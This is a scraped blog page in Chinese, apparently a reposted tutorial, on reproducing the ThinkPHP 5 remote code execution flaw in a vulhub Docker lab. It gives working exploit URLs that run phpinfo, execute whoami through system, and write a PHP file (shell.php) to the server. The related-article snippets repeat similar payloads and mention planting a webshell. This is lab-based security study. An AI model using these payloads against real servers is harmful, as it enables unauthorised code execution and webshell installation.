5-rce版本漏洞复现

最新推荐文章于 2024-08-07 15:33:43 发布

景天学网安

最新推荐文章于 2024-08-07 15:33:43 发布

阅读量98

点赞数

文章标签： web安全

原文链接：https://blog.csdn.net/m0_68471358/article/details/131816873?spm=1001.2014.3001.5502

版权

首先进入靶场环境

cd /usr/local/vulhub/vulhub/thinkphp/5-rce(这个是我自己的路径，大家以自己的为主)

输入vim docker-compose.yml

将version改为“2”，:wq保存退出

接着执行

docker-compose up -d（在开启的时候要注意端口是否冲突，将自己之前的退出）

此时环境以成功搭建

漏洞复现

（1）输出关于 PHP 配置的信息

/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100

（2）whoami

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

（3）还可以将php代码写入文件

/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php phpinfo(); ?>

接着访问shell.php

————————————————
版权声明：本文为CSDN博主「重楼学网安」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。
原文链接：https://blog.csdn.net/m0_68471358/article/details/131816873

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

景天学网安

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce

qq_51577576的博客

10-02

2249

[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce 漏洞复现 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。

vuhub thinkphp-5-rce漏洞复现

qq_46804551的博客

04-24

580

搭建 your-ip:8080 搭建成功漏洞复现 ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5中，由于框架错误地处理了控制器名称，因此如果网站未启用强制路由（默认设置），则该框架可以执行任何方法，从而导致RCE漏洞。 poc: 它将执行phpinfo /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

1 条评论您还未登录，请先登录后发表或查看评论

【vulhub靶场之thinkphp】——（5-rce）

最新发布

weixin_57240513的博客

08-07

432

docker-compose ps//查看开启的端口。

buuctf [ThinkPHP]5-Rce

qq_1873822的博客

03-14

1846

大佬们都是直接rce 这里漏洞技术细节（涉及代码段、原理等）我上个链接 https://blog.csdn.net/ArrowQin/article/details/105913146 https://bbs.ichunqiu.com/thread-48687-1-1.html?tdsourcetag=s_pcqq_aiomsg 解题版本是ThinkPHP V5.0.20 poc ?s=index/\think\app/invokefunction&function=call_user_fun.

【ThinkPHP5 5.0.22/5.1.29 RCE】

xhwfa的博客

05-02

3299

一、漏洞描述 ThinkPHP是一款运用极广的PHP开发框架。其版本5中，因为没有正确处理控制器名，致使在网站没有开启强制路由的状况下（即默认状况下）能够执行任意方法，从而致使远程命令执行漏洞。二、影响版本 ThinkPHP 5.0系列 < 5.0.23 ThinkPHP 5.1系列 < 5.1.31 三、漏洞环境搭建 cd /vulhub-master/thinkphp/5-rce docker-compose up -d 访问192.168.110.134:8080，出现如

SpringBoot-Eureka-xstream-rce漏洞复现

tpaer的博客

11-25

9275

关于SpringBoot-Eureka-xstream-rce漏洞复现的一次实战。

Thinkphp 5-rce 漏洞复现（vulhub）

MDSEC的博客

08-21

250

ThinkPHP其版本5中，由于没有正确处理控制器名，导致在网站没有开启强制路由的情况下（即默认情况下）可以执行任意方法，从而导致远程命令执行漏洞。1.在虚拟机中拉去thinkphp 5-rce镜像。输出关于php的配置信息。执行命令 whoami。连接成功，说明存在漏洞。写入webshell。

vluhub之docker-unauthoriun-rce复现

weixin_45006525的博客

08-07

1512

1.漏洞简介：该未授权访问漏洞是因为docker remote api可以执行docker命令，从官方文档可以看出，该接口是目的是取代docker 命令界面，通过url实现docker命令。 2.漏洞复现环境介绍： 1.攻击机kali:192.168.231.128 2.靶机ubuntu：192.168.231.185 靶场搭建 (1):ubuntu下载vluhub vulhub官网地址：https://vulhub.org github下载：https://github.com/vulhub/vulh

【thinkphp漏洞复现】2-RCE+5.0.23-RCE+5-RCE远程代码执行漏洞+in-sqlinjectionSQL注入漏洞

serendipity1130的博客

09-01

1593

参考文章：https://blog.csdn.net/weixin_43071873/article/details/110084577 一、2-RCE 漏洞详情： ThinkPHP是一个免费开源的一个PHP开发框架。ThinkPHP2.x版本中，使用preg_replace的/e模式匹配路由：导致用户的输入参数被插入双引号中执行，造成任意代码执行漏洞。 preg_replace(‘正则规则’,‘替换字符’,‘目标字符’) 如果目标字符存在符合正则规则的字符，那么就替换为替换字符，如果此时

CTFHUB学习题解Web（5）-RCE

独沐晨霖

07-31

1106

注： 1.是个正在学习的新手，连脚本小子都不够格 2. 很多题目都很基础，但是都做了详细截图 3. 题库尚不完全，没有内容的分支先直接跳过，等题库更新再做添加 4. 大标题为版块名，小标题为题目名 5. 个人学习记录和复习使用，如有错误欢迎指正文章目录eval执行文件包含php://input远程包含读取源代码命令注入过滤cat过滤空格过滤目录分隔符过滤运算符综合过滤练习 eval执行文件包含 php://input 远程包含读取源代码命令注入过滤cat 过滤空格过滤目录分隔符过滤运算符

thinkphp5.0和5.1 rce poc总结

热门推荐

weixin_40709439的博客

01-20

1万+

照搬Sp4ce大神的： https://bbs.ichunqiu.com/thread-49591-1-1.html 版本名是否可被攻击攻击条件 5.0.0 否无 5.0.1 否无 5.0.2 否无 5.0.3 否无 5.0.4 否无 5.0.5 否无 5.0...

thinkphp 5-rce（rce漏洞getshell）

weixin_51692662的博客

11-03

3304

thinkphp 5-rce（rce漏洞getshell）

BUUCTF之[ThinkPHP]5-Rce WP及getShell的新姿势

克格莫（有需要的私信）

10-10

2971

题目给了提示： https://github.com/vulhub/vulhub/blob/master/thinkphp/5-rce 照上面的POC做就能在phpinfo中找到flag，此处不再赘述。拿到flag之后我想通过这个payload拿一波webshell，故使用以下POC写一句话,先创建一个php文件： http://xxxxxxxxx/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_

ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞

a1b2c3是弱口令

12-11

1万+

ThinkPHP是一款运用极广的PHP开发框架。其版本5中，由于没有正确处理控制器名，导致在网站没有开启强制路由的情况下（即默认情况下）可以执行任意方法，从而导致远程命令执行漏洞。复现环境 ThinkPHP 5.0.20版本环境启动后，访问http://192.168.1.15:8080即可看到ThinkPHP默认启动页面。漏洞复现 payload: /index.php?s=inde...

vulhub系列之thinkphp(2-rce、5.0.23-rce、5-rce、in-sqlinjection)

weixin_43071873的博客

11-24

1681

Thinkphp 2.x 任意代码执行漏洞详情： ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架。ThinkPHP 2.x版本中，使用preg_replace的/e模式匹配路由： KaTeX parse error: Undefined control sequence: \w at position 23: …reg_replace('@(\̲w̲+)'.depr.’([^’.KaTeX parse error: Undefined control sequence: \/ at po

buuctf-Real-[ThinkPHP]5-Rce

weixin_46079186的博客

05-09

566

题目地址是ThinkPHP v5这么有名的漏洞，直接网上找poc 找到poc 复制粘贴一下可以执行phpinfo ，尝试执行以下其他命令找了一会没找到，直接写了一个shell 进去找，linux shell脚本原因会过滤$_POST，所以要加\转义使用蚁剑连接找了半天，flag就在phpinfo里面。。。。。 ...

ThinkPHP 5.x RCE分析

0verWatch的博客

02-15

6164

第一次进行代码量这么大的分析，记录一下，个人感觉新手真的不适应这种，应该找点小一点的cms去分析，如果不懂MVC架构真的可能会懵。。。前言在分析这个之前还看了两篇tp5的RCE漏洞，这两个洞都是很相似的，都是利用一个可控的变量dispatch去实现到最后还是构造出回调函数，可以学习一下，感觉这里面的思路就是本文分析漏洞的来源 https://xz.aliyun.com/t/3845 https...

CVE-2019-1003000 Jenkins 不需登录的PreAuth-RCE漏洞复现与实践

本文档主要讨论了CVE-2019-1003000 Jenkins-PreAuth-RCE漏洞的复现过程。这个漏洞无需用户登录即可执行远程代码执行（Remote Code Execution, RCE），对于Jenkins的安全性构成了重大威胁。漏洞利用的关键在于Groovy...